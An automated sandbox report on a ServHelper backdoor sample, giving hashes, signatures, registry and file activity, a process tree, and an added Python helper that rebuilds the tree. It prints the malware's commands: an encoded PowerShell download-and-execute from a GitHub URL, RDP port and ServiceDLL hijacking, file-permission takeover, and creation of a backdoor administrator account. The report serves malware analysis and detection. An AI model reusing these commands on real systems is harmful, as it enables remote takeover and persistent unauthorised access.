Analysis
max time kernel: 133s
max time network: 173s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 19-04-2022 06:01
Static task: static1
Behavioral task: behavioral1
  Sample: f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
  Resource: win10v2004-20220414-en
General
Target: f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
Size: 3.5MB
MD5: 430153f225c19501842717a80283c9ed
SHA1: b53056dd325af27d8c295731dbbe102ace42def6
SHA256: f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab
SHA512: a9051ad3af63a3bed0c63ab7e6ea26a8b4fc944bbf4eca394f1ea07f645c0fd94551fe2b33d86ca62fc86f6ee2ee515ad95b51473511466a679858468cdba8d2
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (10 IoCs)
  flow  pid   process
  33    4368  powershell.exe
  36    4368  powershell.exe
  37    4368  powershell.exe
  39    4368  powershell.exe
  40    4368  powershell.exe
  42    4368  powershell.exe
  45    4368  powershell.exe
  47    4368  powershell.exe
  49    4368  powershell.exe
  52    4368  powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Possible privilege escalation attempt (8 IoCs)
  pid   process
  404   icacls.exe
  5004  icacls.exe
  1648  icacls.exe
  1976  icacls.exe
  2200  takeown.exe
  3860  icacls.exe
  3500  icacls.exe
  3512  icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- YARA rule matches on dropped files
  resource                          yara_rule
  C:\Windows\Branding\mediasrv.png  upx
  C:\Windows\Branding\mediasvc.png  upx
- Loads dropped DLL (2 IoCs)
  pid   process
  2284  (process name not recorded in the report)
  2284  (process name not recorded in the report)
- Modifies file permissions (1 TTP, 8 IoCs)
  pid   process
  3512  icacls.exe
  404   icacls.exe
  5004  icacls.exe
  1648  icacls.exe
  1976  icacls.exe
  2200  takeown.exe
  3860  icacls.exe
  3500  icacls.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP)
- Drops file in System32 directory (1 IoC)
  description   ioc                             process
  File created  C:\Windows\system32\rfxvmt.dll  powershell.exe
- Drops file in Program Files directory (4 IoCs)
  description                   ioc                                                                        process
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  powershell.exe
  File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  powershell.exe
- Drops file in Windows directory (18 IoCs; all by powershell.exe)
  description                   ioc
  File opened for modification  C:\Windows\branding\shellbrd
  File opened for modification  C:\Windows\branding\wupsvc.jpg
  File opened for modification  C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBB61.tmp
  File opened for modification  C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBB90.tmp
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  File created                  C:\Windows\branding\mediasrv.png
  File created                  C:\Windows\branding\wupsvc.jpg
  File opened for modification  C:\Windows\branding\Basebrd
  File created                  C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP
  File opened for modification  C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBC01.tmp
  File created                  C:\Windows\branding\mediasvc.png
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1cvts5ze.mgh.ps1
  File opened for modification  C:\Windows\branding\mediasvc.png
  File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_j5xyjmae.y3s.psm1
  File opened for modification  C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBBA1.tmp
  File opened for modification  C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBBD1.tmp
  File opened for modification  C:\Windows\branding\mediasrv.png
- Program crash (1 IoC)
  pid   pid_target  process       target process
  3768  4984        WerFault.exe  f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
- Modifies data under HKEY_USERS (64 IoCs)
  All 64 entries were written by powershell.exe under \REGISTRY\USER\S-1-5-20, the hive of NT AUTHORITY\NETWORK SERVICE, which matches the file writes under C:\Windows\ServiceProfiles\NetworkService listed above. They are Internet Explorer zone, user-agent and certificate-store initialisation keys. Paths below are relative to \REGISTRY\USER\S-1-5-20.
  Key created       Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ (empty)
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"
  Key created       SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates
  Key created       SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs
  Key created       SOFTWARE\Microsoft\SystemCertificates\trust\Certificates
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"
  Key created       SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs
  Key created       Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"
  Set value (data)  SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000
                    (UTF-16LE: ",Software\Microsoft\Windows\CurrentVersion\Internet Settings,User Agent," followed by the backed-up value "Mozilla/5.0 (compatible; MSIE 9.0; Win32)")
  Key created       Software\Microsoft\Windows\CurrentVersion\Internet Settings
  Key created       Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
  Key created       Software\Microsoft\SystemCertificates\Root
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
  Set value (str)   SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"
  Key created       SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ (empty)
  Key created       SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"
  Key created       SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ (empty)
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"
  Key created       Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"
  Key created       Software\Microsoft\SystemCertificates\SmartCardRoot
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"
  Key created       Software\Microsoft\SystemCertificates\Disallowed
  Key created       SOFTWARE\Microsoft\Windows\CurrentVersion
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ (empty)
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"
  Key created       Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ (empty)
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"
  Key created       Software\Microsoft\SystemCertificates\trust
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"
  Key created       SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"
  Key created       Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\ (empty)
  Key created       SOFTWARE\Microsoft\SystemCertificates\CA\CTLs
  Key created       SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates
  Set value (str)   SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"
  Set value (int)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"
  Key created       SOFTWARE\Microsoft\SystemCertificates\CA\Certificates
  Set value (str)   SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Script User-Agent (5 IoCs)
  Uses user-agent string associated with script host/environment.
  description             flow  ioc                                                         stream
  HTTP User-Agent header  40    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)  1
  HTTP User-Agent header  42    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)  1
  HTTP User-Agent header  36    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)  (none recorded)
  HTTP User-Agent header  37    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)  1
  HTTP User-Agent header  39    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)  1
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid   process
  1756  powershell.exe (5 entries)
  4368  powershell.exe (2 entries)
- Suspicious behavior: LoadsDriver (2 IoCs)
  pid   process
  652   (process name not recorded in the report; 2 entries)
- Suspicious use of AdjustPrivilegeToken (15 IoCs)
  token                          pid   process
  SeDebugPrivilege               1756  powershell.exe
  SeRestorePrivilege             3500  icacls.exe
  SeAssignPrimaryTokenPrivilege  1452  WMIC.exe
  SeIncreaseQuotaPrivilege       1452  WMIC.exe
  SeAuditPrivilege               1452  WMIC.exe
  SeAssignPrimaryTokenPrivilege  1452  WMIC.exe
  SeIncreaseQuotaPrivilege       1452  WMIC.exe
  SeAuditPrivilege               1452  WMIC.exe
  SeAssignPrimaryTokenPrivilege  2240  WMIC.exe
  SeIncreaseQuotaPrivilege       2240  WMIC.exe
  SeAuditPrivilege               2240  WMIC.exe
  SeAssignPrimaryTokenPrivilege  2240  WMIC.exe
  SeIncreaseQuotaPrivilege       2240  WMIC.exe
  SeAuditPrivilege               2240  WMIC.exe
  SeDebugPrivilege               4368  powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs; every parent/child pair below is recorded twice)
  pid   process                                                                  ->  target pid  target process
  4984  f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe  ->  1756        powershell.exe
  1756  powershell.exe  ->  1108  csc.exe
  1108  csc.exe         ->  3712  cvtres.exe
  1756  powershell.exe  ->  2200  takeown.exe
  1756  powershell.exe  ->  3860  icacls.exe
  1756  powershell.exe  ->  3500  icacls.exe
  1756  powershell.exe  ->  3512  icacls.exe
  1756  powershell.exe  ->  404   icacls.exe
  1756  powershell.exe  ->  5004  icacls.exe
  1756  powershell.exe  ->  1648  icacls.exe
  1756  powershell.exe  ->  1976  icacls.exe
  1756  powershell.exe  ->  4232  reg.exe
  1756  powershell.exe  ->  4600  reg.exe
  1756  powershell.exe  ->  2940  reg.exe
  1756  powershell.exe  ->  220   net.exe
  220   net.exe         ->  4120  net1.exe
  1756  powershell.exe  ->  5096  cmd.exe
  5096  cmd.exe         ->  2332  cmd.exe
  2332  cmd.exe         ->  3156  net.exe
  3156  net.exe         ->  2156  net1.exe
  1756  powershell.exe  ->  1088  cmd.exe
  1088  cmd.exe         ->  4028  cmd.exe
  4028  cmd.exe         ->  2964  net.exe
  2964  net.exe         ->  3348  net1.exe
  1756  powershell.exe  ->  3412  cmd.exe
  1756  powershell.exe  ->  3352  cmd.exe
  3596  cmd.exe         ->  4068  net.exe
  4068  net.exe         ->  952   net1.exe
  3968  cmd.exe         ->  5064  net.exe
  5064  net.exe         ->  540   net1.exe
  5052  cmd.exe         ->  3964  net.exe
  3964  net.exe         ->  3984  net1.exe
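The WriteProcessMemory list above is the only place this report records parent and child PIDs together, so it is the data to use when asking which of the later net.exe chains can be tied back to the sample. The Python below is an added example, not sandbox output: it parses a constructed subset of those records (copied from the list, one line per edge), rebuilds the tree, and lists the roots, meaning processes that write into a child but are never themselves a recorded target. For this data that yields the sample (PID 4984) plus the three cmd.exe instances 3596, 3968 and 5052 that drive three of the later cmd.exe -> net.exe -> net1.exe chains; their own parents are not in the report, which is why those chains appear at depth 1 in the process tree rather than under powershell.exe 1756.

```python
"""Rebuild a process tree from a sandbox "wrote to memory of" list.

Added example. RECORDS is a constructed subset of the WriteProcessMemory
signature in this report (each edge once); nothing here is sandbox code.
"""
import re
from collections import defaultdict

RECORDS = """
PID 4984 wrote to memory of 1756 4984 f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe powershell.exe
PID 1756 wrote to memory of 1108 1756 powershell.exe csc.exe
PID 1108 wrote to memory of 3712 1108 csc.exe cvtres.exe
PID 1756 wrote to memory of 2200 1756 powershell.exe takeown.exe
PID 1756 wrote to memory of 4232 1756 powershell.exe reg.exe
PID 1756 wrote to memory of 220 1756 powershell.exe net.exe
PID 220 wrote to memory of 4120 220 net.exe net1.exe
PID 1756 wrote to memory of 5096 1756 powershell.exe cmd.exe
PID 5096 wrote to memory of 2332 5096 cmd.exe cmd.exe
PID 2332 wrote to memory of 3156 2332 cmd.exe net.exe
PID 3156 wrote to memory of 2156 3156 net.exe net1.exe
PID 3596 wrote to memory of 4068 3596 cmd.exe net.exe
PID 4068 wrote to memory of 952 4068 net.exe net1.exe
PID 3968 wrote to memory of 5064 3968 cmd.exe net.exe
PID 5064 wrote to memory of 540 5064 net.exe net1.exe
PID 5052 wrote to memory of 3964 5052 cmd.exe net.exe
PID 3964 wrote to memory of 3984 3964 net.exe net1.exe
"""

# "PID <src> wrote to memory of <dst> <src> <src image> <dst image>"
RECORD_RE = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) "
    r"(?P<src_name>\S+) (?P<dst_name>\S+)"
)


def parse_records(text):
    """Yield (parent_pid, parent_name, child_pid, child_name) per record line."""
    for line in text.splitlines():
        m = RECORD_RE.match(line.strip())
        if m:
            yield int(m["src"]), m["src_name"], int(m["dst"]), m["dst_name"]


class ProcessTree:
    def __init__(self, records):
        self.names = {}                 # pid -> image name
        self.parent = {}                # child pid -> parent pid
        self.children = defaultdict(list)
        for ppid, pname, cpid, cname in records:
            self.names.setdefault(ppid, pname)
            self.names.setdefault(cpid, cname)
            # The report lists every write twice; keep one edge per child.
            if cpid not in self.parent:
                self.parent[cpid] = ppid
                self.children[ppid].append(cpid)

    def roots(self):
        """PIDs that write into a child but never appear as a target."""
        return sorted(pid for pid in self.names if pid not in self.parent)

    def lineage(self, pid):
        """Ancestor chain from the highest recorded ancestor down to pid."""
        chain = [pid]
        while chain[-1] in self.parent:
            chain.append(self.parent[chain[-1]])
        return chain[::-1]

    def render(self, pid, depth=0):
        """Indented text lines for the subtree rooted at pid."""
        lines = [f"{'  ' * depth}{pid} {self.names[pid]}"]
        for child in self.children.get(pid, []):
            lines.extend(self.render(child, depth + 1))
        return lines


def build_tree(text=RECORDS):
    return ProcessTree(parse_records(text))


if __name__ == "__main__":
    tree = build_tree()
    for root in tree.roots():
        print("\n".join(tree.render(root)), end="\n\n")
```

Feeding the full 64-entry list gives the same four roots; a root other than the submitted sample is the cue to look for an unmonitored launcher such as a service host.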
Processes
Bracketed numbers are the nesting depth recorded by the sandbox; a depth-1 entry has no recorded parent. Each entry gives the image path, then the command line, then the signatures that fired on it.

[1] C:\Users\Admin\AppData\Local\Temp\f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
    "C:\Users\Admin\AppData\Local\Temp\f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe"
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      - Drops file in System32 directory
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDDF.tmp" "c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\CSC9AEA88AD1398439A97F918B61E789921.TMP"
    [3] C:\Windows\system32\takeown.exe
        "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            net start TermService
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
  [2] C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4984 -s 652
      - Program crash

[1] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4984 -ip 4984

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user wgautilacc Ghar4f5 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc AOSzoi1P /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe user wgautilacc AOSzoi1P /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user wgautilacc AOSzoi1P /add

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  [2] C:\Windows\system32\net.exe
      net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    cmd /C net.exe user wgautilacc AOSzoi1P
  [2] C:\Windows\system32\net.exe
      net.exe user wgautilacc AOSzoi1P
    [3] C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 user wgautilacc AOSzoi1P

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic path win32_VideoController get name
  [2] C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C wmic CPU get NAME
  [2] C:\Windows\System32\Wbem\WMIC.exe
      wmic CPU get NAME
      - Suspicious use of AdjustPrivilegeToken

[1] C:\Windows\System32\cmd.exe
    cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  [2] C:\Windows\system32\cmd.exe
      cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
